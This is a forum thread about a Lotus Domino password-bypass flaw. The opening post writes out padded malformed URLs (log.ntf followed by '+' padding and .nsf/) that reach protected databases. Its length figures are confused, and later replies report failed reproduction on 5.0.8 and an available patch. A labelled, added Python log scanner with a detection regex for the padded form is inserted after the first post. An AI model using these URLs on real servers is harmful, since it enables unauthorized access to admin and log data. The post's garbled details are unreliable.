Thread: Bypass Lotus Domino password protected url

  1. #1
    Fastest Thing Alive s0nIc's Avatar
    Join Date
    Sep 2001
    Location
    Sydney
    Posts
    1,584

    Bypass Lotus Domino password protected url

    A security vulnerability has been found in the popular Lotus Domino Web server.
    Lotus Domino has files like webadmin.nsf, log.nsf and names.nsf; these files
    are protected by password. It has been discovered that it is possible to bypass
    this password if you create a malformed URL.


    Notes Databases ('.nsf') like webadmin.nsf or log.nsf are stored in the
    "lotus/domino/data/" directory, and Notes Templates ('.ntf') are stored in the
    same place (here is the goal).


    Examples:
    There is a critical and max length.

    assuming the buffer is: http://host.com//

    Critical buffer length: the minimum buffer length you need to bypass the
    passwd file.

    normal url: http://host.com/log.nsf .snf/
    |-----217 -------|

    In the case of log.nsf, it is 217 - 12 = 205 '+' and the URL will be:

    http://host.com/log.ntf++++++++++++++++++++.nsf/
    |-------- 205 -----|


    If you write a buffer between 219 and 257 (higher buffer), you bypass the
    passwd.
    modify url: http://host.com/log.ntf.snf/
    |---219 to 257 --|
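
A log-side check for the padded request form described in the post above, added here as an example (not part of the original post and not Lotus tooling). It assumes the web server writes Common Log Format lines; the `MIN_PAD` threshold, the function names and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Common Log Format (assumed): host ident user [time] "METHOD path PROTO" status size
CLF = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "(\S+) (.*?)(?: HTTP/[\d.]+)?" (\d{3})\b')

MIN_PAD = 8  # assumed threshold: shortest padding run worth flagging
# Template name, a run of '+' (or spaces), then a database extension.
# ".snf" is accepted too because the post writes the suffix both ways.
PADDED = re.compile(r'\.ntf(?P<pad>[+ ]{%d,})\.(?:nsf|snf)(?:/|\?|$)' % MIN_PAD, re.I)

def classify(line):
    """Return None for unrelated requests, else a finding dict."""
    m = CLF.match(line)
    if not m:
        return None
    host, user, _method, raw_path, status = m.groups()
    path = unquote(raw_path)  # decodes %2B to '+' and %20 to ' '
    hit = PADDED.search(path)
    if not hit:
        return None
    # A 2xx answer with no authenticated user means the content was served.
    served = status.startswith("2") and user == "-"
    return {
        "client": host,
        "pad_len": len(hit.group("pad")),
        "path_len": len(path),
        "status": int(status),
        "verdict": "served-without-auth" if served else "rejected",
    }

def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (documentation addresses, made-up timestamps).
SAMPLE = [
    '192.0.2.10 - - [12/Feb/2002:10:01:02 +1100] "GET /log.nsf HTTP/1.0" 401 210',
    '192.0.2.10 - - [12/Feb/2002:10:01:09 +1100] "GET /log.ntf' + "+" * 205 + '.nsf/ HTTP/1.0" 200 5120',
    '192.0.2.77 - - [12/Feb/2002:10:04:41 +1100] "GET /log.ntf' + "+" * 20 + '.nsf/ HTTP/1.0" 404 180',
    '192.0.2.77 - - [12/Feb/2002:10:04:50 +1100] "GET /webadmin.ntf' + "%2B" * 10 + '.nsf/ HTTP/1.0" 401 210',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A "rejected" finding (401 or 404) is still worth reviewing, since it shows a client probing with the padded form even though the server did not serve the database.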

  2. #2
    Leftie Linux Lover the_JinX's Avatar
    Join Date
    Nov 2001
    Location
    Beverwijk Netherlands
    Posts
    2,534
    cool post..
    I didn't know yet.

    thanks for the info. (not that I'm running lotus...)
    ASCII stupid question, get a stupid ANSI.
    When in Russia, pet a PETSCII.

    Get your ass over to SLAYRadio the best station for C64 Remixes !

  3. #3
    Senior Member
    Join Date
    Jan 2002
    Posts
    882
    I was thinking. Wonder if IBM is going to change its Lotus line up now that it is embracing Linux on a large scale in its new line up of servers?
    Anyway. Lotus has always been better than Exchange in many respects. At one point IBM could have had more great products. The SmartSuite Millennium Edition office package was really nice and worked well. As well, the Notes client is fairly robust. It seems IBM is always at the forefront of new technology, or has a good long term product. Then, for some unknown reason, they always drop the ball. MS is a good example. Big Blue got the shaft from them early on and helped seat MS in the position it is today. Go figure.
    The COOKIE TUX lives!!!!
    Windows NT crashed, I am the Blue Screen of Death.
    No one hears your screams.


  4. #4
    Junior Member
    Join Date
    Jan 2002
    Posts
    11
    I'm running Domino 5.0.8. I attempted to go to http://domino/log.ntf. I got a password screen. I attempted to go to http://domino/log.ntf++++++++++++++++++++.nsf/. I got a 404 file not found. I attempted to go to http://domino/log.ntf.snf. I still get a 404 file not found.

    If I read your post correctly, using such a malformed URL should bypass the password.... I can't duplicate this problem. Is it fixed in 5.0.8?

    Thanks,
    -Will Tyler
    -wct097@yahoo.com

  5. #5
    Fastest Thing Alive s0nIc's Avatar
    Join Date
    Sep 2001
    Location
    Sydney
    Posts
    1,584
    I'm sorry, but I'm afraid that the version of the software wasn't mentioned in my sources... I too am looking for what version it is, but I can't find any.

  6. #6
    Junior Member
    Join Date
    Jan 2002
    Posts
    16
    Hi all,
    Checking my resources on the issue: "the bugtraq". The problem appears on Domino 5.0.8 and earlier. Lotus has been informed and there is a patch for this.
    Cheers!